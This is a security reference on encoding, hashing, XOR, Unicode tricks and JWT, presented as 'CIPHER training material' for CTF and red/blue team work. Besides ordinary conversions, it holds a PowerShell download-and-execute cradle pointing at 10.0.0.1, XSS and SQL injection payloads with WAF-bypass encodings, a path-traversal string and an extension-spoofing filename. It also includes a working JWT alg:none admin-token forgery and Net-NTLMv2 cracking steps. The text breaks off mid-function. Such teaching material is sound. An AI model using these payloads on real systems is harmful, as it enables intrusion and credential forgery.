Encoding, Decoding & Data Manipulation — Ultimate Reference
Encoding, Decoding & Data Manipulation — Ultimate Reference
CIPHER training material. Every section includes working code examples for Python 3.10+ and/or Bash/PowerShell. Designed for CTFs, forensics, exploit development, and red/blue team operations.
Table of Contents
- Base Encoding
- Hex Encoding
- URL Encoding
- HTML Entities
- Unicode
- Hashing
- XOR
- ROT13 / ROT47 / Caesar
- JWT
- Regular Expressions for Security
- Obfuscation & Deobfuscation
- Serialization Security
- Compression Security
- Binary & Struct Manipulation
- CyberChef Reference
1. Base Encoding
Base64
Standard alphabet: A-Za-z0-9+/ with = padding. URL-safe variant uses -_ instead of +/.
import base64
# --- Encode / Decode ---
plaintext = b"attack at dawn"
encoded = base64.b64encode(plaintext) # b'YXR0YWNrIGF0IGRhd24='
decoded = base64.b64decode(encoded) # b'attack at dawn'
# --- URL-safe Base64 (replaces + with -, / with _) ---
url_encoded = base64.urlsafe_b64encode(plaintext) # b'YXR0YWNrIGF0IGRhd24='
url_decoded = base64.urlsafe_b64decode(url_encoded)
# --- Decode without padding (common in JWTs, cookies) ---
no_pad = b"YXR0YWNrIGF0IGRhd24" # missing '='
decoded = base64.b64decode(no_pad + b"=" * (-len(no_pad) % 4))
# --- Detect Base64 ---
import re
def is_base64(s: str) -> bool:
pattern = r'^[A-Za-z0-9+/]*={0,2}$'
return bool(re.match(pattern, s)) and len(s) % 4 == 0
# --- File encode/decode ---
with open("/etc/passwd", "rb") as f:
encoded_file = base64.b64encode(f.read())
# Bash — encode/decode
echo -n "attack at dawn" | base64 # YXR0YWNrIGF0IGRhd24=
echo "YXR0YWNrIGF0IGRhd24=" | base64 -d # attack at dawn
# File encode/decode
base64 /etc/passwd > passwd.b64
base64 -d passwd.b64 > passwd_restored
# Decode without trailing newline issues
echo -n "YXR0YWNrIGF0IGRhd24=" | base64 -d
# PowerShell — encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
[Convert]::ToBase64String($bytes) # YXR0YWNrIGF0IGRhd24=
$decoded = [Convert]::FromBase64String("YXR0YWNrIGF0IGRhd24=")
[System.Text.Encoding]::UTF8.GetString($decoded) # attack at dawn
# File encode
$raw = [IO.File]::ReadAllBytes("C:\Windows\System32\calc.exe")
[Convert]::ToBase64String($raw) | Out-File calc.b64
Security notes:
- Base64 is NOT encryption. Attackers use it to bypass naive content filters.
- Double-base64 encoding is common in obfuscated payloads.
- Look for Base64 in HTTP headers (
Authorization: Basic), cookies, POST bodies. - PowerShell
-EncodedCommandaccepts UTF-16LE Base64:powershell -enc <base64>.
Base32
Alphabet: A-Z2-7 with = padding. Case-insensitive. Used in TOTP/HOTP secrets, onion addresses.
import base64
encoded = base64.b32encode(b"attack at dawn") # b'MFYHA3DFNZSCA5DFON2CATQ='
decoded = base64.b32decode(encoded) # b'attack at dawn'
# Case insensitive decode
decoded = base64.b32decode(b"mfyha3dfnzsca5dfon2catq=", casefold=True)
# Bash (requires coreutils or python)
echo -n "attack at dawn" | base32 # MFYHA3DFNZSCA5DFON2CATQ=
echo "MFYHA3DFNZSCA5DFON2CATQ=" | base32 -d # attack at dawn
Base58
No 0OIl characters (avoids visual ambiguity). Used in Bitcoin addresses, IPFS CIDs.
# pip install base58
import base58
encoded = base58.b58encode(b"attack at dawn") # b'4HDeGkTpAkVKFsmvu'
decoded = base58.b58decode(encoded) # b'attack at dawn'
# Base58Check (Bitcoin) — includes version byte + 4-byte checksum
encoded_check = base58.b58encode_check(b"\x00" + b"attack at dawn")
Base85 (Ascii85)
Higher density than Base64 — 4 bytes become 5 ASCII chars. Used in PDF, Git binary patches, ZeroMQ.
import base64
# Ascii85 (Adobe variant)
encoded = base64.a85encode(b"attack at dawn") # b'@UX=hF)rM5Bl7Q+Df'
decoded = base64.a85decode(encoded)
# Base85 (RFC 1924 / Git variant)
encoded = base64.b85encode(b"attack at dawn") # b'VPa!sWo2ML@;IANXJ~X'
decoded = base64.b85decode(encoded)
# Bash — using Python one-liner
echo -n "attack at dawn" | python3 -c "import sys,base64; print(base64.b85encode(sys.stdin.buffer.read()).decode())"
Base encoding detection heuristics
| Encoding | Alphabet | Padding | Length multiple |
|---|---|---|---|
| Base64 | A-Za-z0-9+/ |
= (0-2) |
4 |
| Base64url | A-Za-z0-9-_ |
= or none |
4 |
| Base32 | A-Z2-7 |
= (0-6) |
8 |
| Base58 | 123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz |
None | Variable |
| Base85 | !-u (ASCII 33-117) |
None | 5 per 4 bytes |
2. Hex Encoding
Hex to/from ASCII
# --- ASCII to Hex ---
text = "attack at dawn"
hex_str = text.encode().hex() # '61747461636b206174206461776e'
hex_spaced = ' '.join(f'{b:02x}' for b in text.encode()) # '61 74 74 61 63 6b ...'
# --- Hex to ASCII ---
recovered = bytes.fromhex('61747461636b206174206461776e').decode() # 'attack at dawn'
# --- Hex to ASCII ignoring whitespace ---
dirty_hex = "61 74 74 61\n63 6b"
clean = bytes.fromhex(dirty_hex.replace(' ', '').replace('\n', ''))
# --- Hexdump (xxd-style) ---
import binascii
data = b"\x7fELF\x02\x01\x01\x00"
for i in range(0, len(data), 16):
chunk = data[i:i+16]
hex_part = ' '.join(f'{b:02x}' for b in chunk)
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
print(f'{i:08x} {hex_part:<48} |{ascii_part}|')
# ASCII to hex
echo -n "attack at dawn" | xxd -p # 61747461636b206174206461776e
echo -n "attack at dawn" | od -A x -t x1z -v
# Hex to ASCII
echo "61747461636b206174206461776e" | xxd -r -p # attack at dawn
# Hexdump a binary
xxd /bin/ls | head -20
hexdump -C /bin/ls | head -20
# PowerShell — hex encode/decode
$bytes = [System.Text.Encoding]::UTF8.GetBytes("attack at dawn")
($bytes | ForEach-Object { '{0:x2}' -f $_ }) -join ''
# Hex to bytes
$hex = "61747461636b206174206461776e"
$bytes = for ($i = 0; $i -lt $hex.Length; $i += 2) {
[Convert]::ToByte($hex.Substring($i, 2), 16)
}
[System.Text.Encoding]::UTF8.GetString($bytes)
Hex to/from Binary and Decimal
# Hex <-> Decimal
hex_val = "deadbeef"
decimal = int(hex_val, 16) # 3735928559
back_to_hex = hex(decimal) # '0xdeadbeef'
# Hex <-> Binary
binary = bin(int("ff", 16)) # '0b11111111'
hex_from_bin = hex(int("11111111", 2)) # '0xff'
# IP address: dotted decimal <-> hex
import ipaddress
ip = ipaddress.IPv4Address("192.168.1.1")
hex_ip = format(int(ip), '08x') # 'c0a80101'
ip_back = ipaddress.IPv4Address(int(hex_ip, 16)) # 192.168.1.1
# Useful for shellcode: \x escape format
shellcode_hex = "6a0258994889d74831f60f05"
shellcode_escaped = ''.join(f'\\x{shellcode_hex[i:i+2]}' for i in range(0, len(shellcode_hex), 2))
# '\\x6a\\x02\\x58\\x99\\x48\\x89\\xd7\\x48\\x31\\xf6\\x0f\\x05'
shellcode_bytes = bytes.fromhex(shellcode_hex)
# Decimal to hex
printf '%x\n' 3735928559 # deadbeef
# Hex to decimal
echo $((16#deadbeef)) # 3735928559
printf '%d\n' 0xdeadbeef # 3735928559
# Binary to hex
echo "obase=16;ibase=2;11011110101011011011111011101111" | bc # DEADBEEF
3. URL Encoding
Single encoding
from urllib.parse import quote, unquote, quote_plus, unquote_plus
# Standard percent-encoding (space -> %20)
encoded = quote("admin' OR 1=1--") # "admin%27%20OR%201%3D1--"
decoded = unquote("admin%27%20OR%201%3D1--") # "admin' OR 1=1--"
# Plus-encoding (space -> +, used in form data)
encoded = quote_plus("search term here") # "search+term+here"
decoded = unquote_plus("search+term+here") # "search term here"
# Encode everything (even safe characters)
fully_encoded = quote("test", safe='') # 'test' — all alpha safe by default
fully_encoded = quote("/path/file", safe='') # '%2Fpath%2Ffile'
Double encoding (WAF bypass)
from urllib.parse import quote
payload = "' OR 1=1--"
single = quote(payload, safe='') # %27%20OR%201%3D1--
double = quote(single, safe='') # %2527%2520OR%25201%253D1--
# Server that decodes twice will see the original payload
# First decode: %27%20OR%201%3D1--
# Second decode: ' OR 1=1--
# Triple encoding (rare, but seen in nested proxies)
triple = quote(quote(quote(payload, safe=''), safe=''), safe='')
Unicode URL encoding
from urllib.parse import quote
# UTF-8 URL encoding of Unicode characters
encoded = quote("file:///../etc/passwd") # standard
encoded = quote("\u2025") # %E2%80%A5 (two-dot leader)
# Some parsers normalize \u2025 to ".." -> path traversal
# IRI to URI conversion
iri = "https://example.com/path/\u00e9" # e-acute
uri = quote(iri, safe=':/@') # https://example.com/path/%C3%A9
# Overlong UTF-8 encoding (historic bypass, CVE-2000-0884 IIS)
# Normal '/' = 0x2F = %2F
# Overlong 2-byte: 0xC0 0xAF = %C0%AF
# Overlong 3-byte: 0xE0 0x80 0xAF = %E0%80%AF
# Modern parsers reject these, but legacy systems may not
# Bash — URL encode
python3 -c "from urllib.parse import quote; print(quote(\"admin' OR 1=1--\", safe=''))"
# URL encode with curl
curl -G --data-urlencode "q=admin' OR 1=1--" http://example.com/search
# URL decode
python3 -c "from urllib.parse import unquote; print(unquote('%27%20OR%201%3D1--'))"
# PowerShell
[System.Uri]::EscapeDataString("admin' OR 1=1--")
[System.Uri]::UnescapeDataString("%27%20OR%201%3D1--")
# .NET HttpUtility (requires System.Web)
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::UrlEncode("admin' OR 1=1--")
[System.Web.HttpUtility]::UrlDecode("%27+OR+1%3D1--")
Security notes:
- Double encoding bypasses WAFs that decode only once before rule matching.
%00(null byte) truncates strings in C-based parsers —file.php%00.jpgmay bypass extension checks.%0d%0a= CRLF injection in HTTP headers.- Path normalization differences between proxy and backend enable smuggling.
4. HTML Entities
Named entities
import html
# Encode — only encodes &, <, >, " by default
encoded = html.escape('<script>alert("XSS")</script>')
# '<script>alert("XSS")</script>'
# Encode with single quotes
encoded = html.escape("it's <dangerous>", quote=True)
# 'it's <dangerous>'
# Decode
decoded = html.unescape('<script>alert(1)</script>')
# '<script>alert(1)</script>'
decoded = html.unescape('&lt;') # '<' — only one layer decoded
Numeric (decimal) entities
# Character to decimal entity
char = '<'
entity = f'&#{ord(char)};' # '<'
# String to all-decimal-entities (XSS obfuscation)
payload = '<script>alert(1)</script>'
obfuscated = ''.join(f'&#{ord(c)};' for c in payload)
# '<script>...'
# Decode
import html
decoded = html.unescape('<script>')
# '<script>'
Hex entities
# Character to hex entity
char = '<'
entity = f'&#x{ord(char):x};' # '<'
# String to all-hex-entities
payload = '<img src=x onerror=alert(1)>'
obfuscated = ''.join(f'&#x{ord(c):x};' for c in payload)
# '<img...'
# Mixed encoding (harder for filters)
# <script>alert(1)</script>
# Decode all forms
import html
html.unescape('<<<') # '<<<'
# Bash — decode HTML entities
python3 -c "import html; print(html.unescape('<script>'))"
# Encode
python3 -c "import html; print(html.escape('<script>alert(1)</script>'))"
Security notes:
- Browsers decode HTML entities in attribute values:
<a href="javascript:alert(1)">works with entities. - Entity encoding without semicolons works in some browsers:
<scriptparsed as<script. - Null bytes in entities:
�may bypass filters. - Double encoding:
&lt;decodes to<on first pass,<on second.
Quick reference table
| Character | Named | Decimal | Hex |
|---|---|---|---|
< |
< |
< |
< |
> |
> |
> |
> |
& |
& |
& |
& |
" |
" |
" |
" |
' |
' |
' |
' |
/ |
— | / |
/ |
5. Unicode
UTF-8 encoding internals
# UTF-8 byte representation
text = "cafe\u0301" # cafe + combining accent = "cafe\u0301" (visually: "cafe?")
utf8_bytes = text.encode('utf-8')
print(utf8_bytes.hex()) # 636166 65cc81
# Character byte length in UTF-8
for char in ['A', '\u00e9', '\u4e16', '\U0001f600']:
encoded = char.encode('utf-8')
print(f"U+{ord(char):04X} {char!r:>10} {len(encoded)} bytes {encoded.hex()}")
# U+0041 'A' 1 bytes 41
# U+00E9 'e' 2 bytes c3a9
# U+4E16 '\u4e16' 3 bytes e4b896
# U+1F600 '\U0001f600' 4 bytes f09f9880
# UTF-8 byte ranges
# 0xxxxxxx -> 1 byte (U+0000 to U+007F)
# 110xxxxx 10xxxxxx -> 2 bytes (U+0080 to U+07FF)
# 1110xxxx 10xxxxxx 10xxxxxx -> 3 bytes (U+0800 to U+FFFF)
# 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx -> 4 bytes (U+10000 to U+10FFFF)
UTF-16 encoding
# UTF-16LE is the standard for Windows internals and PowerShell -EncodedCommand
text = "calc.exe"
utf16le = text.encode('utf-16-le')
print(utf16le.hex()) # 630061006c0063002e00650078006500
# Decode
decoded = utf16le.decode('utf-16-le') # 'calc.exe'
# PowerShell encoded command preparation
import base64
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.1/shell.ps1')"
encoded_cmd = base64.b64encode(cmd.encode('utf-16-le')).decode()
# Use as: powershell -enc <encoded_cmd>
# UTF-16 BOM detection
data = b'\xff\xfe\x41\x00' # UTF-16-LE BOM + 'A'
data = b'\xfe\xff\x00\x41' # UTF-16-BE BOM + 'A'
Punycode (IDN homograph attacks)
# Punycode encodes Unicode domain names for DNS
domain = "example.com"
evil_domain = "\u0435xample.com" # Cyrillic 'e' (U+0435) instead of Latin 'e'
# Encode to punycode (ACE form)
punycode = evil_domain.encode('idna') # b'xn--xample-9uf.com'
# Decode punycode
decoded = b'xn--xample-9uf.com'.decode('idna') # looks like 'example.com'
# Detect homographs
def has_mixed_scripts(domain: str) -> bool:
import unicodedata
scripts = set()
for char in domain:
if char in '.-':
continue
cat = unicodedata.category(char)
if cat.startswith('L'):
# Rough script detection via name
name = unicodedata.name(char, '')
if 'CYRILLIC' in name:
scripts.add('cyrillic')
elif 'LATIN' in name:
scripts.add('latin')
elif 'GREEK' in name:
scripts.add('greek')
return len(scripts) > 1
print(has_mixed_scripts("\u0435xample.com")) # True — mixed Cyrillic + Latin
# Bash — punycode conversion
python3 -c "print('\u0435xample.com'.encode('idna'))"
# Using idn command (libidn)
echo "xn--xample-9uf.com" | idn --idna-to-unicode 2>/dev/null
Homoglyph attacks
# Characters that look identical but have different codepoints
homoglyphs = {
'a': ['\u0430'], # Cyrillic а
'e': ['\u0435'], # Cyrillic е
'o': ['\u043e', '\u006f'], # Cyrillic о, Latin o
'p': ['\u0440'], # Cyrillic р
'c': ['\u0441'], # Cyrillic с
'x': ['\u0445'], # Cyrillic х
'H': ['\u041d'], # Cyrillic Н
'T': ['\u0422'], # Cyrillic Т
'B': ['\u0412'], # Cyrillic В
'A': ['\u0391'], # Greek Α
'l': ['\u04cf', '\u0049'], # Cyrillic palochka, Latin I
'0': ['\u041e'], # Cyrillic О
'/': ['\u2044', '\u2215'], # Fraction slash, Division slash
}
# Generate confusable version of a URL
def generate_confusable(url: str) -> str:
import random
result = []
for char in url:
if char in homoglyphs and random.random() > 0.5:
result.append(random.choice(homoglyphs[char]))
else:
result.append(char)
return ''.join(result)
# Detection: normalize and compare
import unicodedata
def confusable_check(s1: str, s2: str) -> bool:
n1 = unicodedata.normalize('NFKC', s1).lower()
n2 = unicodedata.normalize('NFKC', s2).lower()
return n1 == n2 and s1 != s2
Zero-width characters (steganography / watermarking)
# Zero-width characters are invisible but present in text
ZWSP = '\u200b' # Zero-Width Space
ZWNJ = '\u200c' # Zero-Width Non-Joiner
ZWJ = '\u200d' # Zero-Width Joiner
ZWNS = '\ufeff' # Zero-Width No-Break Space (BOM)
# Encode binary data in zero-width characters
def zw_encode(secret: str) -> str:
"""Encode secret as zero-width characters between visible text."""
bits = ''.join(f'{b:08b}' for b in secret.encode())
zw_str = ''
for bit in bits:
zw_str += ZWJ if bit == '1' else ZWSP
return zw_str
def zw_decode(text: str) -> str:
"""Extract zero-width encoded secret from text."""
bits = ''
for char in text:
if char == ZWJ:
bits += '1'
elif char == ZWSP:
bits += '0'
byte_list = [int(bits[i:i+8], 2) for i in range(0, len(bits) - len(bits) % 8, 8)]
return bytes(byte_list).decode('utf-8', errors='ignore')
# Embed in innocent text
visible = "Nothing to see here"
hidden = zw_encode("C2:10.0.0.1")
watermarked = visible[:7] + hidden + visible[7:]
# Looks like "Nothing to see here" but contains hidden data
# Detect zero-width characters
def detect_zw(text: str) -> list[tuple[int, str, str]]:
zw_chars = {'\u200b': 'ZWSP', '\u200c': 'ZWNJ', '\u200d': 'ZWJ',
'\ufeff': 'BOM', '\u200e': 'LRM', '\u200f': 'RLM',
'\u2060': 'WJ', '\u2061': 'FA', '\u2062': 'IT', '\u2063': 'IS'}
found = []
for i, char in enumerate(text):
if char in zw_chars:
found.append((i, f'U+{ord(char):04X}', zw_chars[char]))
return found
# Strip zero-width characters
import re
def strip_zw(text: str) -> str:
return re.sub(r'[\u200b-\u200f\u2060-\u2064\ufeff]', '', text)
Unicode normalization attacks
import unicodedata
# NFC, NFD, NFKC, NFKD normalization forms
# Exploitable when filter checks one form but app uses another
s = "file\u0000.txt" # null byte injection
s = "\uff0e\uff0e/etc/passwd" # fullwidth dots '..' -> path traversal after NFKC
# NFKC normalizes fullwidth to ASCII
print(unicodedata.normalize('NFKC', '\uff0e\uff0e')) # '..'
print(unicodedata.normalize('NFKC', '\uff1c')) # '<'
print(unicodedata.normalize('NFKC', '\uff1e')) # '>'
# Bypass WAF example:
# WAF blocks: <script>
# Send: \uff1cscript\uff1e (fullwidth < and >)
# Backend normalizes NFKC: <script> -> XSS
# Right-to-Left Override attack (file extension spoofing)
filename = "invoice\u202egnp.exe"
# Displays as: invoiceexe.png (appears to be PNG)
# Actual file: invoice[RLO]gnp.exe (is actually .exe)
6. Hashing
MD5 (128-bit, BROKEN for collision resistance)
import hashlib
# String hash
md5 = hashlib.md5(b"password").hexdigest()
# '5f4dcc3b5aa765d61d8327deb882cf99'
# File hash
def md5_file(path: str) -> str:
h = hashlib.md5()
with open(path, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
h.update(chunk)
return h.hexdigest()
echo -n "password" | md5sum # 5f4dcc3b5aa765d61d8327deb882cf99
md5sum /etc/passwd # file hash
$md5 = [System.Security.Cryptography.MD5]::Create()
$bytes = [System.Text.Encoding]::UTF8.GetBytes("password")
[BitConverter]::ToString($md5.ComputeHash($bytes)).Replace("-","").ToLower()
Get-FileHash -Algorithm MD5 C:\Windows\System32\calc.exe
SHA-1 (160-bit, BROKEN — SHAttered collision demonstrated)
sha1 = hashlib.sha1(b"password").hexdigest()
# '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'
echo -n "password" | sha1sum
sha1sum /bin/ls
SHA-256 (256-bit, current standard)
sha256 = hashlib.sha256(b"password").hexdigest()
# '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8'
# HMAC-SHA256
import hmac
sig = hmac.new(b"secret_key", b"message", hashlib.sha256).hexdigest()
echo -n "password" | sha256sum
sha256sum /bin/ls
openssl dgst -sha256 /bin/ls
# HMAC
echo -n "message" | openssl dgst -sha256 -hmac "secret_key"
SHA-512 (512-bit)
sha512 = hashlib.sha512(b"password").hexdigest()
# 'b109f3bbbc244eb82441917ed06d618b9008dd09...'
echo -n "password" | sha512sum
NTLM (Windows password hash)
import hashlib
def ntlm_hash(password: str) -> str:
"""Compute NTLM hash (MD4 of UTF-16LE password)."""
return hashlib.new('md4', password.encode('utf-16-le')).hexdigest()
print(ntlm_hash("Password1"))
# 'a4f49c406510bdcab6824ee7c30fd852'
# LM hash (legacy, DES-based, extremely weak)
# Splits password into two 7-char halves, uppercases, DES encrypts "KGS!@#$%"
# Not shown — do not use LM in any modern system
# NTLM hash with Python one-liner
python3 -c "import hashlib; print(hashlib.new('md4', 'Password1'.encode('utf-16-le')).hexdigest())"
# Using openssl (if md4 available)
echo -n "Password1" | iconv -t utf-16le | openssl dgst -md4 2>/dev/null
Net-NTLMv2 (challenge-response, captured on the wire)
import hashlib
import hmac
import os
def compute_ntlmv2_response(password: str, user: str, domain: str,
server_challenge: bytes, client_challenge: bytes = None) -> str:
"""Compute Net-NTLMv2 response (simplified)."""
if client_challenge is None:
client_challenge = os.urandom(8)
# Step 1: NTLM hash
nt_hash = hashlib.new('md4', password.encode('utf-16-le')).digest()
# Step 2: NTLMv2 hash = HMAC-MD5(NT_hash, uppercase(user) + domain)
identity = (user.upper() + domain).encode('utf-16-le')
ntlmv2_hash = hmac.new(nt_hash, identity, hashlib.md5).digest()
# Step 3: NTLMv2 response = HMAC-MD5(NTLMv2_hash, server_challenge + blob)
# blob is complex in practice; simplified here
blob = server_challenge + client_challenge
ntlmv2_response = hmac.new(ntlmv2_hash, blob, hashlib.md5).hexdigest()
return ntlmv2_response
# Hashcat format for cracking Net-NTLMv2:
# user::domain:server_challenge:ntlmv2_response:blob
# hashcat -m 5600 hash.txt wordlist.txt
Multi-hash utility
import hashlib
def multi_hash(data: bytes) -> dict[str, str]:
"""Compute multiple hashes simultaneously."""
algorithms = ['md5', 'sha1', 'sha256', 'sha512']
return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}
result = multi_hash(b"password")
for algo, digest in result.items():
print(f"{algo:>8}: {digest}")
# Hash identification by length
HASH_LENGTHS = {
32: ['MD5', 'NTLM', 'MD4'],
40: ['SHA-1'],
56: ['SHA-224'],
64: ['SHA-256'],
96: ['SHA-384'],
128: ['SHA-512'],
}
def identify_hash(h: str) -> list[str]:
"""Identify possible hash type by length."""
h = h.strip()
length = len(h)
candidates = HASH_LENGTHS.get(length, ['Unknown'])
# Additional heuristics
if length == 32 and ':' not in h:
# Could be MD5 or NTLM — check context
pass
return candidates
# Compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null
# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'
# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'
7. XOR
Single-byte XOR
def xor_single_byte(data: bytes, key: int) -> bytes:
"""XOR every byte of data with a single key byte."""
return bytes(b ^ key for b in data)
# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex()) # '233626233a2962223626622327'...'
# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext
Multi-byte XOR
from itertools import cycle
def xor_multi_byte(data: bytes, key: bytes) -> bytes:
"""XOR data with a repeating multi-byte key."""
return bytes(d ^ k for d, k in zip(data, cycle(key)))
plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext
Single-byte XOR brute force
def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
"""Brute force all 256 single-byte XOR keys. Score by printable ratio."""
results = []
for key in range(256):
candidate = xor_single_byte(ciphertext, key)
printable = sum(1 for b in candidate if 32 <= b < 127)
score = printable / len(candidate)
results.append((key, candidate, score))
results.sort(key=lambda x: x[2], reverse=True)
return results
# Example: find key for XOR-encoded shellcode
encoded = bytes([0x33, 0x26, 0x26, 0x33, 0x39, 0x29, 0x62, 0x33, 0x26, 0x62, 0x24, 0x33, 0x21, 0x2c])
for key, plaintext, score in xor_bruteforce(encoded)[:3]:
print(f"Key 0x{key:02x} ({score:.0%}): {plaintext}")
Known-plaintext XOR attack
def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
"""Recover XOR key using known plaintext at a known offset."""
key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
return key_fragment
# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...' # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")
# Known plaintext for common file types:
# PE/DLL: b'MZ' (4d5a)
# ELF: b'\x7fELF' (7f454c46)
# PDF: b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP: b'\x1f\x8b' (1f8b)
# PNG: b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG: b'\xff\xd8\xff' (ffd8ff)
# Recover repeating key length using Hamming distance (Kasiski method)
def hamming_distance(b1: bytes, b2: bytes) -> int:
return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))
def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
"""Estimate repeating XOR key length via normalized Hamming distance."""
scores = []
for kl in range(2, max_len + 1):
blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
if len(blocks[3]) < kl:
continue
distances = []
for i in range(len(blocks)):
for j in range(i+1, len(blocks)):
distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
avg = sum(distances) / len(distances)
scores.append((kl, avg))
scores.sort(key=lambda x: x[1])
return scores[:5]
# XOR with Python one-liner
python3 -c "
data = bytes.fromhex('233626233a2962223626622327')
key = 0x42
print(bytes(b ^ key for b in data))
"
# XOR file with a key using xortool
# pip install xortool
xortool -b -l 4 encrypted.bin # guess key length
xortool -b -l 4 -c 00 encrypted.bin # try assuming null byte is most frequent
8. ROT13 / ROT47 / Caesar
ROT13 (letters only, A-Z / a-z shifted by 13)
import codecs
# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13") # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13") # "Attack at dawn"
# Manual implementation
def rot13(text: str) -> str:
result = []
for c in text:
if 'a' <= c <= 'z':
result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
elif 'A' <= c <= 'Z':
result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
else:
result.append(c)
return ''.join(result)
echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m' # Attack at dawn
# Alternative
echo "Attack at dawn" | rot13 # if rot13 command available
ROT47 (printable ASCII 33-126, shifted by 47)
def rot47(text: str) -> str:
"""ROT47: rotate printable ASCII characters (! through ~)."""
result = []
for c in text:
o = ord(c)
if 33 <= o <= 126:
result.append(chr(33 + (o - 33 + 47) % 94))
else:
result.append(c)
return ''.join(result)
encoded = rot47("Attack at dawn!") # "p==246 2= 52H?P"
decoded = rot47(encoded) # "Attack at dawn!"
echo "Attack at dawn!" | tr '!-~' 'P-~!-O'
General Caesar cipher (arbitrary shift)
def caesar(text: str, shift: int) -> str:
result = []
for c in text:
if 'a' <= c <= 'z':
result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
elif 'A' <= c <= 'Z':
result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
else:
result.append(c)
return ''.join(result)
# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
return [(shift, caesar(ciphertext, shift)) for shift in range(26)]
# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
if 'CTF' in candidate or 'flag' in candidate.lower():
print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}
9. JWT (JSON Web Tokens)
Decode JWT (no verification)
import base64
import json
def jwt_decode(token: str) -> dict:
"""Decode JWT without verification — forensic/analysis use."""
parts = token.split('.')
if len(parts) != 3:
raise ValueError("Invalid JWT format")
def decode_part(part: str) -> dict:
# Add padding
padded = part + '=' * (-len(part) % 4)
decoded = base64.urlsafe_b64decode(padded)
return json.loads(decoded)
header = decode_part(parts[0])
payload = decode_part(parts[1])
signature = parts[2]
return {
'header': header,
'payload': payload,
'signature': signature,
'raw_parts': parts
}
# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}
# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}
# Full decode
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
echo "$TOKEN" | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
Forge JWT with alg:none attack (CVE-2015-9235)
import base64
import json
def jwt_forge_none(payload: dict) -> str:
"""Forge JWT with alg:none — exploits servers that don't verify algorithm."""
header = {"alg": "none", "typ": "JWT"}
def encode_part(data: dict) -> str:
return base64.urlsafe_b64encode(
json.dumps(data, separators=(',', ':')).encode()
).rstrip(b'=').decode()
return f"{encode_part(header)}.{encode_part(payload)}."
# Forge admin token
forged = jwt_forge_none({
"sub": "1",
"name": "admin",
"role": "admin",
"iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.
# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"
Forge JWT with HMAC/RSA confusion (CVE-2016-10555)
import hmac
import hashlib
import base64
import json
def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
"""
If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
The server will verify using the public key as HMAC key — signature matches.
"""
